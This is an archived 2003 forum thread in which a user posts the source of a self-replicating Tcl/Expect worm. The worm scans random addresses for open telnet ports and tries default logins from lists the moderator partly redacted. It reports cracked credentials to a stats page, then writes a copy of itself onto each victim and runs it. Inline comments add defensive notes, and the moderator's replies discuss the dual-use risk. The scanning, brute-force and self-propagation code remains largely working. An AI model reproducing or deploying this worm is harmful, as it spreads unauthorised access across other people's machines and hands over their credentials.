TclWorm

Posted by sirius_black (sirius_black), 12 December 2003
Hi !!
Here is a worm coded in Tcl/Expect.
It's the first version.
It looks for boxes with default passwords and saves the ip/login/password in a database (accessed by a PHP script).
If you have some ideas to improve it...


Code:
#!/usr/bin/expect
# tclworm v1.0
# by sirius_black
# http://membres.lycos.fr/lotfree

# Daemonise: the parent process exits at once and the child carries on.
# Expect's disconnect then detaches the child from the controlling
# terminal, so everything below runs in the background with no tty -
# one reason a process like this is easy to overlook on a host.
if {[fork]!=0} exit
disconnect

# Discovery flags filled in by where_are_progs: whether each helper
# binary exists and at which path. wget_found and wget_path are set but
# nothing in the visible script reads them.
set wget_found 0
set telnet_found 0
set wget_path ""
set telnet_path ""

# Credential pairs tried at a telnet prompt, as one flat Tcl list of
# alternating login/password entries (the main loop consumes it two
# elements at a time). This is a braced string, so a comment line inside
# it would become list data - keep notes out here. The lines marked ***
# are the forum moderator's redaction, not Tcl.
# Defensive takeaway: every entry is a factory default, so changing
# default credentials and disabling telnet defeats this list entirely.
set liste_telnet {
   "" ""
   admin 1234
   admin admin
*** Chunk of information removed here for security reasons ***
   test test
   User ""
   write "private"
   write synnet
}

# Second credential list (Cisco-style defaults). Declared but never
# referenced in the visible script; only liste_telnet is used below.
set liste_cisco {
   "" ""
   admin admin
   admin "default"
*** Chunk of code removed here for security reasons ***   
   ripeop ""
   root attack
}

proc get_random_ip {} {
   # Build a random dotted-quad address: four octets, each
   # round(rand()*1000/4), i.e. a value in 0..250. Nothing here limits
   # the range; the only exclusion is the ^127 check in the main loop.
   # Defensive note: this is the classic noisy worm pattern - one host
   # opening TCP/23 connections to many unrelated random addresses is an
   # easy signal for flow monitoring or egress filtering.
   # Tcl point: tcl_precision only has an effect as a global; set inside
   # a proc it creates an unrelated local variable and changes nothing.
   set tcl_precision 3
   set ip ""
   append ip [expr round((rand()*1000)/4)]
   for {set i 0} {$i < 3} {incr i 1} {
     append ip "."
     append ip [expr round((rand()*1000)/4)]
   }
   return $ip
}

proc is_telnet_open ip {
   # Probe TCP port 23 on ip: returns 1 if a plain socket connect
   # succeeds (the socket is closed again at once, no data sent), 0 if
   # the socket command raises. The connect is blocking with no timeout,
   # so each unreachable address stalls the caller until the OS gives up.
   # Defensive note: the connect-then-close with no banner exchange may
   # show up in a telnet server's logs as a connection with no login.
   set is_open 0
   if { [catch {set sock [socket $ip 23]} ] } {
     set is_open 0
   } else {
     set is_open 1
     close $sock
   }
   return $is_open
}

proc where_are_progs {} {
   # Look for the helper binaries at fixed paths (no PATH search) and
   # record the result in the four globals declared at the top of the
   # script. Only telnet_found and telnet_path are consulted later.
   # Tcl point: both if conditions are unbraced, so the bracketed
   # file exists call is substituted before if sees it, leaving 1==1 or
   # 0==1 to evaluate; it works, but the idiomatic form braces the
   # whole condition.
   global wget_found
   global telnet_found
   global wget_path
   global telnet_path
   if [file exists "/usr/bin/wget"]==1 {
     set wget_found 1
     set wget_path "/usr/bin/wget"
   }
   if [file exists "/usr/bin/telnet"]==1 {
     set telnet_found 1
     set telnet_path "/usr/bin/telnet"
   }
}

proc whereis_worm {} {
   # Return this script's own path, assembled as the current directory
   # plus the last component of the script name. This assumes the
   # current directory is the one the script lives in; started from
   # elsewhere the two parts name a different file.
   set worm_path [pwd]
   set file_name [lindex [split [info script] "/"] end]
   append worm_path "/" $file_name
   return $worm_path
}

proc get_content {} {
   # Self-replication primitive: read this script's own source (located
   # by whereis_worm) and return it as one string. Backslash, dollar and
   # backtick are escaped so the text can be pushed through an unquoted
   # shell here-document without the remote shell expanding them, and
   # each line is whitespace-trimmed, which drops the indentation.
   # Defensive note: the copy a victim receives is therefore a plain
   # text file named tclworm (see the main loop) - a simple host-based
   # indicator to search for.
   set f [open [whereis_worm] "r"]
   set texte ""
   while { ![eof $f] } {
     set ligne [gets $f]
     set ligne [string map {\\ \\\\ \$ \\\$ \` \\\`} $ligne]
     set ligne [string trim $ligne]
     append texte "$ligne\n"
   }
   close $f
   return $texte
}

proc MyIpaddr {} {
   # Return an address for this host. First tries "dns address" on the
   # hostname; that is not a core Tcl command and nothing visible loads
   # a package providing it, so the catch branch is presumably the usual
   # path. Fallback: open a listening socket on an ephemeral port,
   # connect to it from this same process, and read the client side's
   # local address from fconfigure -sockname. On the catch branch addr
   # first holds the error message and is then overwritten.
   set addr ""
   if {[catch {dns address [info hostname]} addr]} {
       set server [socket -server # 0]
     set port [lindex [fconfigure $server -sockname] 2]
     set host [lindex [fconfigure $server -sockname] 1]
     set client [socket $host $port]
       set addr [lindex [fconfigure $client -sockname] 0]
       close $client
       close $server
   }
   return $addr
}

proc MyNet {} {
   # Strip the last octet from MyIpaddr's result: the greedy (.*) keeps
   # everything up to the final dot. Returns "" if the regexp does not
   # match. Not called anywhere in the visible script.
   set net ""
   regexp {(.*)\..*} [MyIpaddr] {} net
   return $net
}

proc declare_becane {ip login password} {
   # Report a successful login to the author's statistics page and ask
   # whether to proceed. Loads the http package on demand, sets a fixed
   # User-Agent, then GETs wormstat.php on localhost:3128 with ip, login
   # and password as raw query parameters (no URL encoding).
   # Returns "zut" if http cannot be loaded, the request raises, or the
   # status is not ok; "next" if the reply body contains "haxored"
   # (already recorded, move on); otherwise "go".
   # Defensive notes: the User-Agent "TCLWORM v1.0 (LOTFREE)" and the
   # wormstat.php query string are usable proxy/IDS signatures. The
   # target is localhost:3128, a port commonly used by a local forwarding
   # proxy - how the report reaches the author is not visible here.
   # lheaders is set but never passed to geturl.
   set lheaders "Connection close"
   if {![llength [info commands "::http::geturl"]]} {
     if {[catch {package require http}]} {
         return "zut"
     }
   }
   ::http::config -useragent "TCLWORM v1.0 (LOTFREE)"
   set htmlUrl "http://localhost:3128/wormstat.php?ip=$ip&login=$login&pass=$password"
   if { [catch { ::http::geturl $htmlUrl} token]} {
     return "zut"
   }
   if { [::http::status $token] != "ok"} {
     return "zut"
   }
   set htmlFile [::http::data $token]
   if { [regexp "haxored" $htmlFile] == 1 } {
     return "next"
   }
   return "go"
}

# Main scan loop. Locate telnet first, then loop forever: pick a random
# address, skip loopback, probe port 23, and on an open port walk the
# credential list with an Expect-driven telnet session. Only the telnet
# path is implemented; wget_found is never consulted in the visible
# script.
# Defensive summary of what a victim host sees: a telnet login from the
# scanning host, a here-document that writes a file named tclworm into
# the login shell's current directory, chmod +x, and execution - at which
# point the new copy starts scanning from the victim. Disabling telnet,
# removing default credentials, and blocking outbound TCP/23 each break
# that chain; the User-Agent set in declare_becane is a further signature.
where_are_progs

set ip ""
while {1==1} {
   # Candidate target; 127.x is the only range excluded.
   set ip [get_random_ip]
   if { [regexp "^127" $ip] == 1 } {
     continue
   }
   if { ![is_telnet_open $ip] } {
     continue
   } else {
     if {$telnet_found == 1} {
         # use telnet
         # One fresh telnet session per login/passwd pair. The expect
         # bodies below are pattern/action lists, so notes stay outside
         # them.
         foreach {login passwd} $liste_telnet {
           spawn -noecho $telnet_path $ip 23
           # Login prompt: send the username; any error banner moves on
           # to the next pair. The patterns are matched as written,
           # including the misspelt "adresse".
           expect {
               "ogin:" { send "$login\n" }
               "user:" { send "$login\n" }
               "imeout" { continue }
               "ailure" { continue }
               "nknow host" { continue }
               "o route to host" { continue }
               "o adresse associated with name" { continue }
           }
           # Password prompt, or an "incorrect" rejection.
           expect {
               "incorrect" { continue }
               "ssword:" { send "$passwd\n" }
           }
           # A shell was reached ("ast login:" banner): report it via
           # declare_becane. If the stats page already knows this box,
           # log out and try the next pair; otherwise push a copy of
           # this script over the session and leave.
           expect {
               "ast login:" {
                 if { [declare_becane $ip $login $passwd] == "next" } {
                 send "logout\nexit\n"
                     continue
                 } else {
                     # Write the worm body with a here-document, mark it
                     # executable, start it, then log out of this box.
                     exec sleep 2
                     send "cat > tclworm << EOF\n"
                     expect ">"
                     send [get_content]
                     expect ">"
                     send "EOF\n"
                     expect "$"
                     send "chmod +x tclworm\n"
                     expect "$"
                     send "./tclworm\n"
                     expect "$"
                     send "logout\nexit\n"
                     break
                 }
               }
           }
         }
     }
     # end of: use telnet

   }
}


This post was modified to remove data which could help malicious users run the program against networks where they are not authorised to do so.  See the follow-up post for my fuller explanation - Graham

Posted by admin (Graham Ellis), 13 December 2003
Hmmm

Expect is a great tool for automated testing which is exactly what you're using it for ...

Programs such as the one that you have posted are valuable in the right hands - they allow (let us say) a system administrator to check the security of his own network against breakins.  But in the wrong hands, such programs provide tools for the unauthorised visitor to find weaknesses and attempt breakins. Posting up complete code for a "worm" such as this is similar to posting up someone else's password in that it lessens their security and for this reason I am modifying your post to remove some of the data (not-Tcl) elements of the code.   That way, it remains available for discussion of the Tcl issues, but doesn't provide anyone who happens to find it with a breaking-in tool!

Graham (Wearing his moderator's hat!)

Posted by sirius_black (sirius_black), 15 December 2003
yes I understand.
The reason I made it was only to understand how a worm works.
I don't want the worm to delete file or crash systems. I only use it to see statistics of propagation ...
It was very interestant (does this word exist in english ?) to code it and I want to share the source with other programmers

Posted by admin (Graham Ellis), 15 December 2003
I'm 100% happy with posting / sharing code - I just modified it slightly so that this board doesn't become a place for people to get hold of code that could easily be misused.  



This page is a thread posted to the opentalk forum at www.opentalk.org.uk and archived here for reference. To jump to the archive index please follow this link.

